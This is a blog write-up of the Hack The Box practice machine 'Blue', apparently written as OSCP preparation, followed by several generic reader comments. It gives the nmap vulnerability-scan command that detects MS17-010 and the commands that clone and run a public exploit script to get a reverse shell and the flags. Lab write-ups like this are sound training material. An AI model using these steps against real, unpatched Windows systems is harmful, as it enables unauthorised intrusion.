OSCP PREPARATIONS – HTB Blue

Blue is a vulnerable Windows machine among the retired machines. The goal is to obtain the user and root flags by using these vulnerabilities.
We perform a network scan with nmap to identify the target machine.
Classic scan

Full port scan

As a result of the port scan, we found many open ports. Let’s scan the first three ports for vulnerabilities.
nmap -T5 10.10.10.40 -Pn -p 135,139,445 --script vuln -vvv -oN vulnscan.txt

We detected the MS17-010 vulnerability in the SMB service.
Let’s search for this vulnerability on Google and look through the code on GitHub to see whether there is an exploit we can use.

Here we tried the code that gives a shell most easily and with the fewest errors:
https://github.com/d4t4s3c/Win7Blue
We found the repository address, then downloaded and ran the code from it:
git clone https://github.com/d4t4s3c/Win7Blue.git
cd Win7Blue
chmod +x Win7Blue.sh
./Win7Blue.sh
We ran the commands in order.

We entered the requested input values.
And we received a connection on the listener we had opened in the background.

This way we got user and root flags.

Comments

  1. Branndon

    I think this is among the most important info for me. And I am glad reading your article.
    But should remark on few general things, The website style is ideal,
    the articles are really great : D. Good job, cheers

  2. Eira

    Great post; however, I was wondering if you could write a
    little more on this subject? I’d be very grateful if you could elaborate
    a little bit more. Kudos!

  3. Jennifier

    Hola! I’ve been reading your weblog for a long time now and finally got the bravery to go ahead and give you a shout out from New Caney Texas!
    Just wanted to tell you keep up the good job!

  4. Lanette

    It’s like you read my mind! You seem to know so much about this,
    like you wrote the book in it or something. I think that you can do with a few pics to drive the message home a bit, but other than that,
    this is an excellent blog. An excellent read. I’ll certainly be back.

  5. Leana

    Hello, just wanted to give you a quick heads up. The words in your post
    seem to be running off the screen in Internet Explorer.

    I’m not sure if this is a formatting issue or something to do with web browser compatibility but I thought I’d post to let you know.

    The layout looks great though! Hope you get the problem resolved
    soon. Kudos

  6. Valrie

    After I originally left a comment I seem to have clicked
    on the -Notify me when new comments are added- checkbox and from now on each time a comment is added
    I get four emails with the same comment.
    There has to be an easy method you can remove me
    from that service? Cheers!
